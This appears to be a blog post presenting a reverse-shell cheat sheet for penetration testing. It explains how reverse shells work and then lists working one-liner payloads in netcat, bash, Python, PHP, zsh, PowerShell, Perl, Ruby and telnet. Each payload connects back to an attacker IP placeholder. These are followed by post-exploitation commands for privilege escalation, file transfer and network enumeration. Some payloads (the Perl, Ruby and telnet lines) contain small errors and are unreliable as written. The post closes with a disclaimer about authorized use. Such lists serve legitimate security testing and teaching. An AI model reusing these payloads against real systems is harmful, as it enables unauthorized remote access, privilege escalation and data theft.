Open in app

Sign in

Write

Sign in

Reverse Shell Cheat Sheet: Creating and Using Reverse Shells for Penetration Testing and Security Research

Cuncis
4 min readFeb 24, 2023

What is a Reverse Shell?

A reverse shell is a type of shell in which the target machine initiates a connection to the attacker’s machine, allowing the attacker to execute commands on the target machine remotely. Reverse shells are commonly used in penetration testing and other security-related tasks, as they allow an attacker to gain remote access to a system without the need for any user interaction or network configuration.

To establish a reverse shell, the attacker typically creates a shell payload, which is a small program or script that is designed to establish a connection back to the attacker’s machine. This payload is then uploaded to the target machine, either through a vulnerability or by tricking the user into running it. Once the payload is executed, it establishes a connection back to the attacker’s machine, creating a shell session that can be used to execute commands on the target machine.

How Does a Reverse Shell Work?

A reverse shell works by establishing a connection between the target machine and the attacker’s machine. This connection is typically initiated by the target machine, which sends a request to the attacker’s machine to establish a connection. Once the connection is established, the attacker’s machine acts as a listener, waiting for commands to be sent by the attacker.

To create a reverse shell, the attacker first needs to create a shell payload that is designed to connect back to the attacker’s machine. This can be done using a variety of tools and programming languages, such as Netcat, Python, or Metasploit. Once the payload is created, it is typically uploaded to the target machine using a vulnerability or social engineering tactics.

Once the payload is executed on the target machine, it establishes a connection back to the attacker’s machine. This connection can be encrypted to prevent detection and can use a variety of protocols, such as TCP, UDP, or HTTP. Once the connection is established, the attacker can use the shell session to execute commands on the target machine, access files and data, and even escalate privileges if necessary.

Why Are Reverse Shells Used?

Reverse shells are commonly used in penetration testing and other security-related tasks because they provide a way to gain remote access to a system without the need for any user interaction or network configuration. Reverse shells can be used to test the security of a system, identify vulnerabilities, and perform various types of attacks, such as stealing data, modifying files, or running malicious software.

Reverse shells are also commonly used in post-exploitation activities, as they allow an attacker to maintain access to a system even if the initial vulnerability or exploit is patched. By establishing a reverse shell on a compromised system, an attacker can continue to monitor the system, exfiltrate data, or even launch additional attacks on other systems within the network.

Creating a Reverse Shell

There are several tools and programming languages that can be used to create a reverse shell payload. Here are some examples:

Netcat

nc -e /bin/sh <attacker IP> <attacker port>

Bash

bash -i >& /dev/tcp/<attacker IP>/<attacker port> 0>&1

Python

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker IP>",<attacker port>))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

PHP

php -r '$sock=fsockopen("<attacker IP>",<attacker port>);exec("/bin/sh -i <&3 >&3 2>&3");'

ZSH

zsh -c 'zmodload zsh/net/tcp && ztcp <attacker IP> <attacker port> && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

Powershell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker IP>',<attacker port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Perl

perl -e 'use Socket;$i="$ENV{<attacker IP>}";$p=$ENV{<attacker port>};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["<attacker IP>"],ENV["<attacker port>"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Telnet

TF=$(mktemp -u); mkfifo $TF && telnet <attacker IP> <attacker port> 0<$TF | /bin sh 1>$TF

Using a Reverse Shell

Once you have created a reverse shell payload and established a connection to the target machine, you can use the shell session to execute commands and perform various actions on the target machine. Here are some useful commands and techniques:

Basic Commands

  • pwd: Print current working directory.
  • ls: List contents of current directory.
  • cd: Change current directory.
  • cat: Display contents of a file.
  • rm: Remove a file or directory.
  • mkdir: Create a new directory.
  • cp: Copy a file or directory.
  • mv: Move a file or directory.

Privilege Escalation

  • sudo -l: List available sudo commands for the current user.
  • sudo <command>: Run a command with elevated privileges.
  • su: Switch to the root user.
  • sudo su: Switch to the root user with elevated privileges.

File Transfer

  • wget <file URL>: Download a file from the internet.
  • curl <file URL>: Download a file from the internet.
  • nc -l <local port> > <file>: Receive a file over the network using netcat.
  • nc <target IP> <target port> < <file>: Send a file over the network using netcat.

Network Enumeration

  • ifconfig: Display network interface information.
  • netstat -tulpn: List active network connections.
  • arp -a: Display ARP table.
  • ping <target IP>: Test network connectivity to a target.
  • nmap: Scan a network for open ports and services.

This is a basic cheat sheet for creating and using reverse shells. It is important to note that using reverse shells for unauthorized access to systems is illegal and can lead to severe consequences. Reverse shells should only be used for legitimate security testing or research purposes with the proper authorization and permission.

Conclusion

Reverse shells are a powerful tool for attackers and security professionals alike, providing a way to gain remote access to a system and execute commands without the need for any user interaction or network configuration. While reverse shells can be used for both legitimate and malicious purposes, they are an essential tool for testing the security of systems and identifying vulnerabilities. As with any tool, it is important to use reverse shells responsibly and ethically, and only in the context of authorized security testing or research.

Reverse Shell
Cheatsheet
Hacking
Red Team
Penetration Testing

--

--

Cuncis

Written by Cuncis

699 Followers

Penetration Tester | Bug Hunter | Ethical Hacker - Connect with me on https://twitter.com/wh1te_h0le

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams